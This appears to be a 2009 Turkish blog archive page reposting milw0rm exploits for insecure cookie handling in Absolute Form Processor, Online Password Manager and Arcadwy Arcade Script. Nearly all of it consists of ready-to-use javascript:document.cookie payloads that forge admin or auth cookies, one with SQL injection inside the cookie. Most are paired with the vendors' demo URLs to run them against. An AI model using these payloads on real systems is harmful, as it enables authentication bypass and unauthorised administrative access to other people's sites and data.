kaynak: http://www.yildirimordulari.com/showthread.php?t=6138
exploit:
javascript:document.cookie = "xlaAFPadmin=lvl=1&userid=1; path=/";
after you go here:
http://www.xigla.com/absolutefp/demo/menu.asp
Insecure Cookie Handling etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
Insecure Cookie Handling etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
24 Nisan 2009 Cuma
Absolute Form Processor XE-V 1.5 Insecure Cookie Handling Vuln
kaynak: http://www.milw0rm.com/exploits/8529
kaynak: http://www.yildirimordulari.com/showthread.php?t=6138
kaynak: http://www.yildirimordulari.com/showthread.php?t=6138
17 Nisan 2009 Cuma
Online Password Manager 4.1 Insecure Cookie Handling Vulnerability
kaynak: http://www.milw0rm.com/exploits/8450
kaynak: http://www.yildirimordulari.com/showthread.php?t=5515
kaynak: http://www.yildirimordulari.com/showthread.php?t=5515
yildirimordulari.com/OPM/main.php
Exploit:
javascript:document.cookie = "auth=[nick]; path=/";
Exploit for demo:
http://www.esoftpro.com/demo/OPM/main.php
javascript:document.cookie = "auth=admin; path=/";
30 Mart 2009 Pazartesi
Arcadwy Arcade Script (Auth Bypass) Insecure Cookie Handling Vuln
Kaynak: http://www.milw0rm.com/exploits/8304
Discovered By: ZoRLu
Demo:
http://games.arcadwy.com/
Exploit:
javascript:document.cookie = "user=[admin_id],' or ' 1=1--; path=/";
Exploit for demo:
javascript:document.cookie = "user=1,' or ' 1=1--; path=/";
Kaydol:
Yorumlar (Atom)
